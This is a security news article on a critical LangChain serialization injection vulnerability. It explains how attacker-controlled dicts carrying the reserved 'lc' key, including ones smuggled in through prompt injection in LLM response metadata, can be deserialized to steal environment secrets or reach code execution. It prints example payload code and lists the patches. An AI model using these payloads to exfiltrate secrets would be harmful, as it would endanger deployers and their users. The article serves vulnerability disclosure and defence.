Critical LangChain Vulnerability Allows Attackers to Steal Sensitive Secrets

A critical serialization injection vulnerability in LangChain, one of the world's most widely deployed AI frameworks, enables attackers to extract environment variable secrets and potentially achieve code execution.

The vulnerability, identified as CVE-2025-68664, affects the core langchain-core library and was disclosed on December 25, 2025, by security researcher Yarden Porat of Cyata.

Vulnerability Overview

The vulnerability stems from improper handling in the serialization functions dumps() and dumpd() in langchain-core.

CVE ID: CVE-2025-68664
GHSA ID: GHSA-c67j-w6g6-q2cm
CVSS Score: 9.3 (Critical)

These functions failed to escape user-controlled dictionaries containing the reserved ‘lc’ key, which LangChain uses internally to mark serialized objects.

When attacker-controlled data includes this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.
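To make the ambiguity concrete, here is a minimal sketch (illustrative only; the node layout mirrors the structure quoted later in this article):

```python
# A genuine LangChain serialization node is marked with the reserved "lc" key:
serialized_node = {"lc": 1, "type": "secret", "id": ["OPENAI_API_KEY"]}

# Attacker-supplied data can carry exactly the same shape:
user_data = {"lc": 1, "type": "secret", "id": ["OPENAI_API_KEY"]}

# Pre-patch, dumps()/dumpd() emitted both without escaping the "lc" key,
# so the deserializer had no way to tell the injected dict from a real node.
```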

The vulnerability affects applications that use standard LangChain features, including the Runnable methods astream_events(version="v1") and astream_log(), RunnableWithMessageHistory, and various caching mechanisms.

The most dangerous attack path involves prompt injection via LLM response fields such as additional_kwargs or response_metadata, which can be serialized and deserialized via standard streaming operations.
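A rough sketch of that path, assuming a vulnerable langchain-core build (the streaming plumbing is omitted; only the serialization step is shown):

```python
from langchain_core.load import dumpd
from langchain_core.messages import AIMessage

# An LLM response whose metadata carries attacker-influenced content;
# the nested dict mimics LangChain's internal serialization marker:
msg = AIMessage(
    content="benign-looking answer",
    additional_kwargs={"note": {"lc": 1, "type": "secret", "id": ["API_KEY"]}},
)

# Pre-patch, dumpd() emitted the nested "lc" structure unescaped, so any
# component that later deserializes this blob (streaming, message history,
# caches) would treat the injected dict as a real LangChain node.
blob = dumpd(msg)
```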

Successful exploitation allows attackers to extract environment variable secrets by injecting structures like {"lc": 1, "type": "secret", "id": ["ENV_VAR"]} during deserialization when secrets_from_env=True (the previous default setting).
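Condensed into a proof-of-concept-style sketch (FAKE_API_KEY is a stand-in; exact return types and the loads() signature vary by version):

```python
import os
from langchain_core.load import loads

os.environ["FAKE_API_KEY"] = "hunter2"  # stand-in secret for demonstration

# Attacker-controlled structure that survived an unescaped dumps()/dumpd():
payload = '{"lc": 1, "type": "secret", "id": ["FAKE_API_KEY"]}'

# On vulnerable versions, the reviver resolves "secret" nodes from the
# process environment when secrets_from_env=True (the old default),
# handing the secret's value back instead of the plain dict:
leaked = loads(payload, secrets_from_env=True)
print(leaked)  # contains "hunter2" on unpatched builds
```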

Attackers can also instantiate classes with controlled parameters within trusted namespaces, potentially triggering network calls, file operations, or code execution through Jinja2 template rendering.
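The shape of such a payload might look like the sketch below; the class path and keyword arguments are hypothetical, shown only to illustrate the mechanism:

```python
# Hypothetical constructor node: "id" points at a class inside a trusted
# namespace and "kwargs" supplies attacker-chosen constructor arguments.
malicious_node = {
    "lc": 1,
    "type": "constructor",
    "id": ["langchain", "prompts", "prompt", "PromptTemplate"],
    "kwargs": {
        "input_variables": [],
        "template": "{{ attacker_controlled_expression }}",
        "template_format": "jinja2",
    },
}
# On vulnerable versions, deserializing this instantiates the class; when
# the resulting template is rendered, the attacker's Jinja2 expression is
# evaluated, which is the code-execution path described above.
```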

LangChain has released patches in versions 1.2.5 and 0.3.81 that fix the escaping bug and introduce restrictive defaults.

The allowed_objects parameter now defaults to ‘core’ (limiting deserialization to core objects), secrets_from_env changed from True to False, and Jinja2 templates are now blocked by default through a new init_validator parameter.
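Teams that want to make the hardened behavior explicit rather than relying on defaults can do so at the call site; a usage sketch, with parameter names taken from the advisory (verify them against your installed version):

```python
from langchain_core.load import dumps, loads
from langchain_core.messages import HumanMessage

# Upgrade first, e.g.: pip install -U "langchain-core>=0.3.81"
serialized = dumps(HumanMessage(content="hello"))

# Spelling out the restrictive defaults documents intent:
obj = loads(
    serialized,
    allowed_objects="core",   # restrict deserialization to core objects
    secrets_from_env=False,   # never resolve secrets from os.environ
)
```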

Most users deserializing standard LangChain types will experience no disruption, but custom implementations may require code adjustments.

Organizations running LangChain in production should update immediately, as the framework has recorded approximately 847 million total downloads, including 98 million in the last month alone.

LangChain awarded a $4,000 bounty for this finding, the largest bounty ever awarded in the project.
